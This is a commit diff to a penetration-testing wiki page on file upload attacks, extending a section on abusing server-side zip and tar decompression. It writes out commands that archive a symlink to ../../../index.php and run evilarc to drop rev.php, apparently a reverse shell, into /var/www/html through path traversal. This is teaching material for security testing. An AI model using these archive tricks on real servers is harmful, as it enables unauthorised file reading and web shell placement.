GitBook: [#2892] update

pentesting-web/file-upload/README.md

@@ -169,7 +169,7 @@ Here’s a top 10 list of things that you can achieve by uploading (from [link](
 
 Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
 
-## Zip File Automatically decompressed Upload
+## Zip/Tar File Automatically decompressed Upload
 
 If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
 
@@ -180,6 +180,7 @@ Upload a link containing soft links to other files, then, accessing the decompre
 ```
 ln -s ../../../index.php symindex.txt
 zip --symlinks test.zip symindex.txt
+tar -cvf test.tar symindex.txt
 ```
 
 ### Decompress in different folders
@@ -188,10 +189,11 @@ The decompressed files will be created in unexpected folders.
 
 One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
 
-An automated exploit to create this kind of files can be found here: [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
+An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)****
 
 ```python
-python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
+python2 evilarc.py -h
+python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
 ```
 
 Some python code to create a malicious zip: